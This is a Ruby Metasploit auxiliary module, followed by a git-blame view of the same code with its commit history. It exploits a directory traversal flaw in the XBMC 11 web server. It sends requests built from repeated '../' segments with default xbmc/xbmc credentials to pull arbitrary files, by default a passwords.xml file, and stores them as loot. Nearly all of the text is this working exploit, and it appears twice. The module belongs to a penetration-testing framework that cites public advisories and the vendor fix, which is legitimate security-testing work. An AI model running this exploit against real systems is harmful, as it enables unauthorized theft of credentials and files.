metasploit-framework/modules/auxiliary/gather/xbmc_traversal.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Auxiliary::Report
	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "XBMC Web Server Directory Traversal",
			'Description'    => %q{
					This module exploits a directory traversal bug in XBMC 11, up until the
				2012-11-04 nightly build. The module can only be used to retrieve files.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton
					'Lucas "acidgen" Lundgren IOActive',
					'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
				],
			'References'     =>
				[
					['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'],
					['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'],
					['URL', 'http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf'],
				],
			'DisclosureDate' => "Nov 4 2012"
		))

		register_options(
			[
				Opt::RPORT(8080),
				OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']),
				OptInt.new('DEPTH', [true, 'The max traversal depth', 9]),
				OptString.new('USERNAME', [true, 'The username to use for the HTTP server', 'xbmc']),
				OptString.new('PASSWORD', [false, 'The password to use for the HTTP server', 'xbmc']),
			], self.class)
	end

	def run
		# No point to continue if no filename is specified
		if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
			print_error("Please supply the name of the file you want to download")
			return
		end

		# Create request
		traversal = "../" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep
		begin
			res = send_request_raw({
				'method' => 'GET',
				'uri'    => "/#{traversal}/#{datastore['FILEPATH']}",
				'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD'])
			}, 25)
		rescue Rex::ConnectionRefused
			print_error("#{rhost}:#{rport} Could not connect.")
			return
		end

		# Show data if needed
		if res
			if res.code == 200
				vprint_line(res.to_s)
				fname = File.basename(datastore['FILEPATH'])

				path = store_loot(
					'xbmc.http',
					'application/octet-stream',
					datastore['RHOST'],
					res.body,
					fname
				)
				print_good("File saved in: #{path}")
			elsif res.code == 401
				print_error("#{rhost}:#{rport} Authentication failed")
			elsif res.code == 404
				print_error("#{rhost}:#{rport} File not found")
			end
		else
			print_error("HTTP Response failed")
		end
	end
end
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Auxiliary::Report`
			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "XBMC Web Server Directory Traversal",`
			`'Description' => %q{`
Kinda too long 2013-02-25 19:44:11 +00:00			`This module exploits a directory traversal bug in XBMC 11, up until the`
			`2012-11-04 nightly build. The module can only be used to retrieve files.`
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
Added fix URL and a few more comments. Corrected date. 2012-11-08 15:09:28 +00:00			`'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton`
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00			`'Lucas "acidgen" Lundgren IOActive',`
Fixed name 2013-02-21 20:48:41 +00:00			`'Matt "hostess" Andreko <mandreko[at]accuvant.com>'`
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00			`],`
			`'References' =>`
			`[`
Added fix URL and a few more comments. Corrected date. 2012-11-08 15:09:28 +00:00			`['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'],`
			`['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'],`
Added reference & depth Added reference to IOActive's release. Added a depth option to allow user to specify how many folders to traverse. 2013-02-05 19:32:50 +00:00			`['URL', 'http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf'],`
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00			`],`
Added fix URL and a few more comments. Corrected date. 2012-11-08 15:09:28 +00:00			`'DisclosureDate' => "Nov 4 2012"`
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00			`))`

			`register_options(`
			`[`
			`Opt::RPORT(8080),`
			`OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']),`
Added reference & depth Added reference to IOActive's release. Added a depth option to allow user to specify how many folders to traverse. 2013-02-05 19:32:50 +00:00			`OptInt.new('DEPTH', [true, 'The max traversal depth', 9]),`
Code Review Feedback Modified USER and PASS to USERNAME and PASSWORD Moved the Scanner mixin to the bottom and removed deregister 2013-02-21 21:55:27 +00:00			`OptString.new('USERNAME', [true, 'The username to use for the HTTP server', 'xbmc']),`
Made the password optional 2013-02-23 22:14:30 +00:00			`OptString.new('PASSWORD', [false, 'The password to use for the HTTP server', 'xbmc']),`
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00			`], self.class)`
			`end`

Code Review Feedback Fixed the USER/PASS that I missed in last review Converted from Scanner module to Gather 2013-02-23 15:09:23 +00:00			`def run`
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00			`# No point to continue if no filename is specified`
			`if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?`
			`print_error("Please supply the name of the file you want to download")`
			`return`
			`end`

			`# Create request`
Added reference & depth Added reference to IOActive's release. Added a depth option to allow user to specify how many folders to traverse. 2013-02-05 19:32:50 +00:00			`traversal = "../" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep`
Added basic error handling 2013-02-23 15:24:04 +00:00			`begin`
			`res = send_request_raw({`
			`'method' => 'GET',`
			`'uri' => "/#{traversal}/#{datastore['FILEPATH']}",`
Fix up basic auth madness 2013-03-01 17:59:02 +00:00			`'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD'])`
Added basic error handling 2013-02-23 15:24:04 +00:00			`}, 25)`
			`rescue Rex::ConnectionRefused`
			`print_error("#{rhost}:#{rport} Could not connect.")`
			`return`
			`end`
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00
			`# Show data if needed`
			`if res`
			`if res.code == 200`
			`vprint_line(res.to_s)`
			`fname = File.basename(datastore['FILEPATH'])`

			`path = store_loot(`
			`'xbmc.http',`
			`'application/octet-stream',`
Code Review Feedback Fixed the USER/PASS that I missed in last review Converted from Scanner module to Gather 2013-02-23 15:09:23 +00:00			`datastore['RHOST'],`
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00			`res.body,`
			`fname`
			`)`
			`print_good("File saved in: #{path}")`
			`elsif res.code == 401`
Added fix URL and a few more comments. Corrected date. 2012-11-08 15:09:28 +00:00			`print_error("#{rhost}:#{rport} Authentication failed")`
Added XBMC Traversal exploit 2012-11-04 02:19:48 +00:00			`elsif res.code == 404`
			`print_error("#{rhost}:#{rport} File not found")`
			`end`
			`else`
			`print_error("HTTP Response failed")`
			`end`
			`end`
			`end`